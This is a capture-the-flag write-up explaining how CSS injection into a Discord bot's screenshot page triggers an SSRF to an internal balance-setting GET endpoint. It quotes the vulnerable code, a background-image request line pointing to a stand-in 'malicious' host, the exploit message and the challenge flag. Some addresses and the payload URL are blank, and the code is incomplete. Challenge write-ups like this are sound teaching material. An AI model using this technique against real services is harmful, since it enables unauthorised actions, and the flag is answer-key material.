Tags: web xss
# Casino
Can you make $1000 off Casino#4970 on our Discord server? (say `$help` to view commands)
Attachments: `casino.zip`
## Solution
Exploit: SSRF to `/set_balance` endpoint using CSS
The web server trusts input from the Discord bot:
function internal (req, res, next) {
if (
req.socket.remoteAddress === '' ||
req.socket.remoteAddress === '::ffff:'
) {
return next()
return res.status(403).end()
The Discord bot visits `/badge` and screenshots it when we do the `!badge`
command. It also allows us to add arbitrary CSS, though angle brackets are escaped:
const css = (req.query.css || '').replace(/</g, '<').replace(/>/g, '>')
We can't escape from the `<style>` tag, but we can still make GET requests using:
background-image: url(http://malicious)
Also the challenge author is an idiot and `/set_balance` is conveniently a GET
endpoint. So all we have to do is send this message
!badge `#badge { background-image: url( }`
Then `!flag` to get `CCC{maybe_1_sh0uldv3d_us3d_P0ST_in5t3ad_of_G3T}`